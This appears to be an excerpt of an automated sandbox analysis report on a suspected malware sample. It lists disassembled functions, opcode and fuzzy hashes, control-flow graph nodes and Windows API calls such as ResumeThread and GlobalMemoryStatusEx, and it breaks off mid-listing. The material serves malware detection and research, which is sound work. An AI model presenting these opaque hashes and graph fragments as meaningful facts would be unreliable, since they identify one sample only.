                                                          • Opcode ID: a2982665f6807016dedb585fcbb8182f6e1f4d98fd5b39a3a1067762a980261f
                                                          • Instruction ID: c17d7bdb908547e43a8bbcecc899e96636e98398cb8866f2b386fdeee78eed48
                                                          • Opcode Fuzzy Hash: a2982665f6807016dedb585fcbb8182f6e1f4d98fd5b39a3a1067762a980261f
                                                          • Instruction Fuzzy Hash: 4031BAB4D002589FCB10DFAAD984AEEFBF1BB49314F24802AE419B7240C739AA45CF54
                                                          Function 00989498 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 433 989498-98952e ResumeThread 437 989530-989536 433->437 438 989537-989579 433->438 437->438
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 0098951E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 90ef833ff10b2036471850260e2b55fd80b93a8b712c8e0d34d5f09176420823
                                                          • Instruction ID: 48e4960bd5cbdb16c06cf5a7f07898f203967a794ff1c28166c7a3533b0ed6bd
                                                          • Opcode Fuzzy Hash: 90ef833ff10b2036471850260e2b55fd80b93a8b712c8e0d34d5f09176420823
                                                          • Instruction Fuzzy Hash: AB31CDB4D012189FCB14DFA9D585AEEFBF4EB49320F24941AE819B7340D735A905CF54
                                                          Function 009894A0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 443 9894a0-98952e ResumeThread 446 989530-989536 443->446 447 989537-989579 443->447 446->447
                                                          APIs
                                                          • ResumeThread.KERNELBASE(?), ref: 0098951E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 0af7d0efd2248ec2cff8fe91b6ef9220101974552234061571b6ad3f2c4e590f
                                                          • Instruction ID: cf420273f03da968150c218c6b39e14b6188320be4a99c2c23b4a8043f3395ae
                                                          • Opcode Fuzzy Hash: 0af7d0efd2248ec2cff8fe91b6ef9220101974552234061571b6ad3f2c4e590f
                                                          • Instruction Fuzzy Hash: 8131CAB4D012189FCB14DFAAD984AAEFBF4EB49310F24942AE819B7340C734A901CF94

                                                          Non-executed Functions

                                                          Function 009855C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: P$K$P$K
                                                          • API String ID: 0-3898856386
                                                          • Opcode ID: 207736c52e5db69385a02dc3b993626defeb44ba60d4b4db34413aa2c3282787
                                                          • Instruction ID: 17da86123e2cd6fdfd59d1c0e48bde74ff8e37b53e57d592ff2584db62dc91e8
                                                          • Opcode Fuzzy Hash: 207736c52e5db69385a02dc3b993626defeb44ba60d4b4db34413aa2c3282787
                                                          • Instruction Fuzzy Hash: A581EF74A15619CFCB04CFA9C58499EFBF2FF88310F65856AE419AB324D334AA46CF50
                                                          Function 009869D0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: kg$kg
                                                          • API String ID: 0-2847053812
                                                          • Opcode ID: 7d1b78953d8f48d7f2744ffebc062170c0be46c51fd4a1e842e2397d1b26e13b
                                                          • Instruction ID: 571586567527f79e1db6a4f5abb83b8d6740e22a90f35142dd54a6b6e318da51
                                                          • Opcode Fuzzy Hash: 7d1b78953d8f48d7f2744ffebc062170c0be46c51fd4a1e842e2397d1b26e13b
                                                          • Instruction Fuzzy Hash: FE51D275E146199FCB08DFA9D9809AEFBF2BF88300F24852AD815BB314D7349A01CF54
                                                          Function 0098A620 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: f5046681f0ec2a74ecc3fb9fde9fbd3f52d8ebf67210bd263b50f8ce6dc62e5f
                                                          • Instruction ID: dab5f3d08f150f85e9f5172e8ce83a192cd0e23632d10f0960a4d74c7acd2a72
                                                          • Opcode Fuzzy Hash: f5046681f0ec2a74ecc3fb9fde9fbd3f52d8ebf67210bd263b50f8ce6dc62e5f
                                                          • Instruction Fuzzy Hash: DB613670E05669CBDB68CF66C84479DB7B6AFC9300F24C9AAC40EB7214EB345AC58F40
                                                          Function 0098A610 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: 72e4f221ea40161a5cef09cf325011c2db7422fa36c8a92e19ad81c6ba5c749a
                                                          • Instruction ID: 95754921e5e0213f6010f844db423f7fcac15621a6f1b1cbae9a81d0d446f813
                                                          • Opcode Fuzzy Hash: 72e4f221ea40161a5cef09cf325011c2db7422fa36c8a92e19ad81c6ba5c749a
                                                          • Instruction Fuzzy Hash: CC611671E14669CBDB68CF66C84479EBBB2BFC9300F14C5AAC50DA7224EB345AC58F41
                                                          Function 009869C0 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: kg
                                                          • API String ID: 0-1677352279
                                                          • Opcode ID: 9b8759d50c5eda29841a730148b96d24683b671defc3084075e367886caf7f81
                                                          • Instruction ID: 822530d75af31efe028b63dddd3da82554afdea3f8513730432dda285f3af892
                                                          • Opcode Fuzzy Hash: 9b8759d50c5eda29841a730148b96d24683b671defc3084075e367886caf7f81
                                                          • Instruction Fuzzy Hash: F6512471E156199FCB08DFA9C9809AEFBF2BF88300F24856AE815BB351D7349A01CB54
                                                          Function 0098A893 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: 8e0d8a0b3df8515e42a0eb4a9eceae67860e232fd357918592fb5f9c118055d6
                                                          • Instruction ID: e5d1b0c914ce8d8d90ac0fe0058b133dc0110c95ab00d945805c583709f4c57c
                                                          • Opcode Fuzzy Hash: 8e0d8a0b3df8515e42a0eb4a9eceae67860e232fd357918592fb5f9c118055d6
                                                          • Instruction Fuzzy Hash: 84510570D1466ACBDB64CF65C84079DB7B2BF99300F24DAEAD10AB3214EB349AC59F41
                                                          Function 0098A877 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: a8da6a2a6600feb863c01d18b322816cc3ae896d9541f0e02e45bd132e1c22df
                                                          • Instruction ID: 68f131d1d893dbd0adb3523fc2e03aecd9d9b6ab374a2d8d80374627fc5a4161
                                                          • Opcode Fuzzy Hash: a8da6a2a6600feb863c01d18b322816cc3ae896d9541f0e02e45bd132e1c22df
                                                          • Instruction Fuzzy Hash: 26510670E1466ACBDB64CF65C84079DB7B2BF99300F24DAE6D10EB2214EB349AC59F41
                                                          Function 0098A818 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: 8b9b8d82be074a68f3e81f6445dda85eebb70056bdbaf6d21eb75928dbcb7629
                                                          • Instruction ID: bbb993284f2b979bcec3957a6308c31adcd2fa1b85240f0a0053472e881b8417
                                                          • Opcode Fuzzy Hash: 8b9b8d82be074a68f3e81f6445dda85eebb70056bdbaf6d21eb75928dbcb7629
                                                          • Instruction Fuzzy Hash: 33510870D1466ACBDB64CF65C84079DB7B2BF99300F24DAE6D10EB2214EB349AC59F41
                                                          Function 0098730A Relevance: .2, Instructions: 209COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1237f0d74af30f709370da9b2966a7f366ae295a68362434c913b821ad5945e3
                                                          • Instruction ID: 32eac2441e68534d81cf9f551dab1f8835645f2ea15cb1db85973473f5ae93fe
                                                          • Opcode Fuzzy Hash: 1237f0d74af30f709370da9b2966a7f366ae295a68362434c913b821ad5945e3
                                                          • Instruction Fuzzy Hash: 73914A74E042198FCB04DFA9D994A9EFBF2FF89300F24856AE418AB365D7349941DF50
                                                          Function 00987328 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a15f9c7de5695511926117e4f39bd75a116099147974451a9b36a29ca6b2b98
                                                          • Instruction ID: 95b40aa7c3cbd36be05ba53a09ee34ed76796294fc60caf160fd331cdd24bf8f
                                                          • Opcode Fuzzy Hash: 3a15f9c7de5695511926117e4f39bd75a116099147974451a9b36a29ca6b2b98
                                                          • Instruction Fuzzy Hash: CA911974E042198FDB04DFA9D984A9EFBF2FF88300F24856AE419AB365D7349942DF50
                                                          Function 00981868 Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e7e153b715d78b1d88fe09d90107b6cb445babb281fef3672f8a7806df5614f
                                                          • Instruction ID: d6970ea4dee2bd899a456b220456fe1a59041b9568d1e67edcac10d99bcc06e9
                                                          • Opcode Fuzzy Hash: 7e7e153b715d78b1d88fe09d90107b6cb445babb281fef3672f8a7806df5614f
                                                          • Instruction Fuzzy Hash: CD818D70D053588FDB14DF6AC850A9AFBF2BF89300F19C0AAD448AB356D7359986CF52
                                                          Function 00986418 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13e1ce841665536a5e152bc0e99a7ece511c9317b4ed96db0a872147c312b87f
                                                          • Instruction ID: 22fc88d64e5977232d0ff6512f7d4315fb80231f5fd9d544466d1bfb30a97411
                                                          • Opcode Fuzzy Hash: 13e1ce841665536a5e152bc0e99a7ece511c9317b4ed96db0a872147c312b87f
                                                          • Instruction Fuzzy Hash: 876118B0E052199FCB04DFA9D5815AEFBB2FF49300F14C86AD455AB354D738AA42CF90
                                                          Function 009878F8 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe5f713070540010a22dbd82790091fd5743cec313cd3cde4676e16bcf6eeceb
                                                          • Instruction ID: 178b6a3c4f4e75b6b098812b817f3f892751ff3a2fb530eb58ba944085023654
                                                          • Opcode Fuzzy Hash: fe5f713070540010a22dbd82790091fd5743cec313cd3cde4676e16bcf6eeceb
                                                          • Instruction Fuzzy Hash: 9F5129B0D09669DBDB14DFE9C9849AEFBB2BF89300F24C529D018AB359D7349941CF90
                                                          Function 00986798 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd4d525b70cfe7db886853035cbabc8f056d2a68a993168f99691ec58a51d790
                                                          • Instruction ID: 5151a81682492d170bf34334ea6a281e7aaf4aab05f41bb8976e7db4396b761e
                                                          • Opcode Fuzzy Hash: bd4d525b70cfe7db886853035cbabc8f056d2a68a993168f99691ec58a51d790
                                                          • Instruction Fuzzy Hash: D94109B4D0460ADBCB08DFAAC9815AEFBF2BF88300F24D46AD515AB354D3349A45CF94
                                                          Function 00988A68 Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: edef94a4b7ba23e8cad5e6ad3693275d6a6fa3e0f9347758dfa9de000e9d3bcd
                                                          • Instruction ID: 3a660cae908f8ff49b60c1f3141ae811dd68d9b4d895be0a42f4d38d5636cb8e
                                                          • Opcode Fuzzy Hash: edef94a4b7ba23e8cad5e6ad3693275d6a6fa3e0f9347758dfa9de000e9d3bcd
                                                          • Instruction Fuzzy Hash: 7E413DB0E05619DFDB18CFAAD98099EFBF2BF88310F64852AD405AB365DB349941CF50

                                                          Execution Graph

                                                          Execution Coverage:11.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:17
                                                          Total number of Limit Nodes:2
                                                          execution_graph 23352 1360848 23354 136084e 23352->23354 23353 136091b 23354->23353 23356 1361351 23354->23356 23357 1361356 23356->23357 23358 1361450 23357->23358 23360 1367f48 23357->23360 23358->23354 23361 1367f52 23360->23361 23362 1367f94 23361->23362 23366 6a5f960 23361->23366 23362->23357 23368 6a5f975 23366->23368 23367 1367f65 23370 136ed98 23367->23370 23368->23367 23369 6a5fb9f GlobalMemoryStatusEx 23368->23369 23369->23368 23371 136edb2 23370->23371 23372 136eff9 23371->23372 23373 6a5fb9f GlobalMemoryStatusEx 23371->23373 23372->23362 23373->23371

                                                          Executed Functions

                                                          Function 06A53050 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 127 6a53050-6a53071 128 6a53073-6a53076 127->128 129 6a53817-6a5381a 128->129 130 6a5307c-6a5309b 128->130 131 6a53840-6a53842 129->131 132 6a5381c-6a5383b 129->132 139 6a530b4-6a530be 130->139 140 6a5309d-6a530a0 130->140 134 6a53844 131->134 135 6a53849-6a5384c 131->135 132->131 134->135 135->128 137 6a53852-6a5385b 135->137 145 6a530c4-6a530d3 139->145 140->139 142 6a530a2-6a530b2 140->142 142->145 253 6a530d5 call 6a53870 145->253 254 6a530d5 call 6a53868 145->254 146 6a530da-6a530df 147 6a530e1-6a530e7 146->147 148 6a530ec-6a533c9 146->148 147->137 169 6a533cf-6a5347e 148->169 170 6a53809-6a53816 148->170 179 6a534a7 169->179 180 6a53480-6a534a5 169->180 182 6a534b0-6a534c3 179->182 180->182 184 6a537f0-6a537fc 182->184 185 6a534c9-6a534eb 182->185 184->169 186 6a53802 184->186 185->184 188 6a534f1-6a534fb 185->188 186->170 188->184 189 6a53501-6a5350c 188->189 189->184 190 6a53512-6a535e8 189->190 202 6a535f6-6a53626 190->202 203 6a535ea-6a535ec 190->203 207 6a53634-6a53640 202->207 208 6a53628-6a5362a 202->208 203->202 209 6a536a0-6a536a4 207->209 210 6a53642-6a53646 207->210 208->207 211 6a537e1-6a537ea 209->211 212 6a536aa-6a536e6 209->212 210->209 213 6a53648-6a53672 210->213 211->184 211->190 223 6a536f4-6a53702 212->223 224 6a536e8-6a536ea 212->224 220 6a53674-6a53676 213->220 221 6a53680-6a5369d 213->221 220->221 221->209 227 6a53704-6a5370f 223->227 228 6a53719-6a53724 223->228 224->223 227->228 231 6a53711 227->231 232 6a53726-6a5372c 228->232 233 6a5373c-6a5374d 228->233 231->228 234 6a53730-6a53732 232->234 235 6a5372e 232->235 237 6a53765-6a53771 233->237 238 6a5374f-6a53755 233->238 234->233 235->233 242 6a53773-6a53779 237->242 243 6a53789-6a537da 237->243 239 6a53757 238->239 240 6a53759-6a5375b 238->240 239->237 240->237 244 6a5377d-6a5377f 242->244 245 6a5377b 242->245 243->211 244->243 245->243 253->146 254->146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-2877684506
                                                          • Opcode ID: 9f5418bb2d3f9ecede9ee17ccadc5cad0177528164eec067fc7b462ced2f4819
                                                          • Instruction ID: 2680f7667505a03f41d9602af66387d08ec6ee913ee834bd180ef2701cea303d
                                                          • Opcode Fuzzy Hash: 9f5418bb2d3f9ecede9ee17ccadc5cad0177528164eec067fc7b462ced2f4819
                                                          • Instruction Fuzzy Hash: E5322F31E1071ACFCB14EF64C99459DB7B2FFD9340F61C66AD409AB264EB34A985CB80
                                                          Function 06A57D68 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 797 6a57d68-6a57d86 798 6a57d88-6a57d8b 797->798 799 6a57d8d-6a57da7 798->799 800 6a57dac-6a57daf 798->800 799->800 801 6a57dc6-6a57dc9 800->801 802 6a57db1-6a57dbf 800->802 803 6a57dec-6a57def 801->803 804 6a57dcb-6a57de7 801->804 812 6a57dc1 802->812 813 6a57e0e-6a57e24 802->813 807 6a57df1-6a57dfb 803->807 808 6a57dfc-6a57dfe 803->808 804->803 809 6a57e05-6a57e08 808->809 810 6a57e00 808->810 809->798 809->813 810->809 812->801 817 6a5803f-6a58049 813->817 818 6a57e2a-6a57e33 813->818 819 6a57e39-6a57e56 818->819 820 6a5804a-6a5807f 818->820 829 6a5802c-6a58039 819->829 830 6a57e5c-6a57e84 819->830 823 6a58081-6a58084 820->823 825 6a582b9-6a582bc 823->825 826 6a5808a-6a58099 823->826 827 6a582df-6a582e2 825->827 828 6a582be-6a582da 825->828 834 6a580b8-6a580fc 826->834 835 6a5809b-6a580b6 826->835 832 6a5838d-6a5838f 827->832 833 6a582e8-6a582f4 827->833 828->827 829->817 829->818 830->829 850 6a57e8a-6a57e93 830->850 837 6a58396-6a58399 832->837 838 6a58391 832->838 840 6a582ff-6a58301 833->840 851 6a58102-6a58113 834->851 852 6a5828d-6a582a3 834->852 835->834 837->823 841 6a5839f-6a583a8 837->841 838->837 845 6a58303-6a58309 840->845 846 6a58319-6a5831d 840->846 853 6a5830d-6a5830f 845->853 854 6a5830b 845->854 848 6a5831f-6a58329 846->848 849 6a5832b 846->849 855 6a58330-6a58332 848->855 849->855 850->820 856 6a57e99-6a57eb5 850->856 863 6a58119-6a58136 851->863 864 6a58278-6a58287 851->864 852->825 853->846 854->846 859 6a58334-6a58337 855->859 860 6a58343-6a5837c 855->860 867 6a57ebb-6a57ee5 856->867 868 6a5801a-6a58026 856->868 859->841 860->826 880 6a58382-6a5838c 860->880 863->864 874 6a5813c-6a58232 call 6a56590 863->874 864->851 864->852 881 6a58010-6a58015 867->881 882 6a57eeb-6a57f13 867->882 868->829 868->850 930 6a58234-6a5823e 874->930 931 6a58240 874->931 881->868 882->881 888 6a57f19-6a57f47 882->888 888->881 894 6a57f4d-6a57f56 888->894 894->881 895 6a57f5c-6a57f8e 894->895 903 6a57f90-6a57f94 895->903 904 6a57f99-6a57fb5 895->904 903->881 907 6a57f96 903->907 904->868 905 6a57fb7-6a5800e call 6a56590 904->905 905->868 907->904 932 6a58245-6a58247 930->932 931->932 932->864 933 6a58249-6a5824e 932->933 934 6a58250-6a5825a 933->934 935 6a5825c 933->935 936 6a58261-6a58263 934->936 935->936 936->864 937 6a58265-6a58271 936->937 937->864
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq
                                                          • API String ID: 0-2695052418
                                                          • Opcode ID: 9181766091e4d280111272cb91ed38fe203aa41e2cbfc08cd8ff5acee6598d44
                                                          • Instruction ID: 4ddd1ae339f62df5da2aa4825f9a3e77bd2a734b3b1e69828bde574e8a5ad461
                                                          • Opcode Fuzzy Hash: 9181766091e4d280111272cb91ed38fe203aa41e2cbfc08cd8ff5acee6598d44
                                                          • Instruction Fuzzy Hash: 8C028A31B002259FDB54EF64D994AAEB7F2FF84310F158969D805EB394DB39EC468B80
                                                          Function 06A55598 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1662 6a55598-6a555b5 1663 6a555b7-6a555ba 1662->1663 1664 6a555d0-6a555d3 1663->1664 1665 6a555bc-6a555c5 1663->1665 1668 6a555d5-6a555f4 1664->1668 1669 6a555f9-6a555fc 1664->1669 1666 6a55723-6a55729 1665->1666 1667 6a555cb 1665->1667 1670 6a5576c-6a5579b 1666->1670 1671 6a5572b-6a55733 1666->1671 1667->1664 1668->1669 1672 6a55606-6a55609 1669->1672 1673 6a555fe-6a55601 1669->1673 1687 6a557a5-6a557a8 1670->1687 1671->1670 1676 6a55735-6a55742 1671->1676 1674 6a55618-6a5561b 1672->1674 1675 6a5560b-6a55611 1672->1675 1673->1672 1679 6a5561d-6a55627 1674->1679 1680 6a55635-6a55638 1674->1680 1678 6a55613 1675->1678 1675->1679 1676->1670 1681 6a55744-6a55748 1676->1681 1678->1674 1688 6a5562e-6a55630 1679->1688 1683 6a55649-6a5564c 1680->1683 1684 6a5563a-6a5563e 1680->1684 1685 6a5574d-6a5574f 1681->1685 1693 6a55665-6a55668 1683->1693 1694 6a5564e-6a55660 1683->1694 1689 6a55644 1684->1689 1690 6a5575f-6a5576b 1684->1690 1691 6a55756-6a55759 1685->1691 1692 6a55751 1685->1692 1695 6a557ca-6a557cd 1687->1695 1696 6a557aa-6a557ae 1687->1696 1688->1680 1689->1683 1691->1663 1691->1690 1692->1691 1697 6a55671-6a55674 1693->1697 1698 6a5566a-6a5566c 1693->1698 1694->1693 1703 6a557ef-6a557f2 1695->1703 1704 6a557cf-6a557d3 1695->1704 1701 6a557b4-6a557bc 1696->1701 1702 6a5589a-6a558d4 1696->1702 1699 6a55676-6a55685 1697->1699 1700 6a5568a-6a5568d 1697->1700 1698->1697 1699->1700 1707 6a55697-6a5569a 1700->1707 1708 6a5568f-6a55692 1700->1708 1701->1702 1706 6a557c2-6a557c5 1701->1706 1723 6a558d6-6a558d9 1702->1723 1710 6a557f4-6a557fb 1703->1710 1711 6a55806-6a55809 1703->1711 1704->1702 1709 6a557d9-6a557e1 1704->1709 1706->1695 1714 6a556ad-6a556b0 1707->1714 1715 6a5569c-6a556a8 1707->1715 1708->1707 1709->1702 1716 6a557e7-6a557ea 1709->1716 1717 6a55801 1710->1717 1718 6a55892-6a55899 1710->1718 1719 6a55827-6a5582a 1711->1719 1720 6a5580b-6a5580f 1711->1720 1714->1675 1724 6a556b6-6a556b9 1714->1724 1715->1714 1716->1703 1717->1711 1721 6a55844-6a55847 1719->1721 1722 6a5582c-6a55830 1719->1722 1720->1702 1725 6a55815-6a5581d 1720->1725 1727 6a5585f-6a55862 1721->1727 1728 6a55849-6a5585a 1721->1728 1722->1702 1726 6a55832-6a5583a 1722->1726 1729 6a558e3-6a558e6 1723->1729 1730 6a558db-6a558e0 1723->1730 1732 6a556c3-6a556c6 1724->1732 1733 6a556bb-6a556c0 1724->1733 1725->1702 1734 6a5581f-6a55822 1725->1734 1726->1702 1735 6a5583c-6a5583f 1726->1735 1738 6a55864-6a5586b 1727->1738 1739 6a5586c-6a5586f 1727->1739 1728->1727 1736 6a558fe-6a55901 1729->1736 1737 6a558e8-6a558fb 1729->1737 1730->1729 1732->1665 1740 6a556cc-6a556cf 1732->1740 1733->1732 1734->1719 1735->1721 1744 6a55903-6a55914 1736->1744 1745 6a5591b-6a5591e 1736->1745 1742 6a55871-6a5587b 1739->1742 1743 6a55880-6a55882 1739->1743 1746 6a556d1-6a556e7 1740->1746 1747 6a556ec-6a556ef 1740->1747 1742->1743 1753 6a55884 1743->1753 1754 6a55889-6a5588c 1743->1754 1744->1737 1768 6a55916 1744->1768 1748 6a55996-6a55b2a 1745->1748 1749 6a55920-6a55923 1745->1749 1746->1747 1750 6a556f1-6a556fa 1747->1750 1751 6a556fb-6a556fe 1747->1751 1811 6a55c60-6a55c73 1748->1811 1812 6a55b30-6a55b37 1748->1812 1756 6a55925-6a55936 1749->1756 1757 6a5593d-6a55940 1749->1757 1760 6a55700-6a55706 1751->1760 1761 6a5570d-6a55710 1751->1761 1753->1754 1754->1687 1754->1718 1766 6a55942-6a55949 1756->1766 1772 6a55938 1756->1772 1757->1766 1767 6a5594e-6a55951 1757->1767 1760->1708 1762 6a55708 1760->1762 1763 6a55712-6a55719 1761->1763 1764 6a5571e-6a55721 1761->1764 1762->1761 1763->1764 1764->1666 1764->1685 1766->1767 1770 6a55953-6a55964 1767->1770 1771 6a5596b-6a5596e 1767->1771 1768->1745 1770->1756 1780 6a55966 1770->1780 1774 6a55970-6a55981 1771->1774 1775 6a55988-6a5598b 1771->1775 1772->1757 1774->1766 1784 6a55983 1774->1784 1775->1748 1776 6a5598d-6a55990 1775->1776 1776->1748 1778 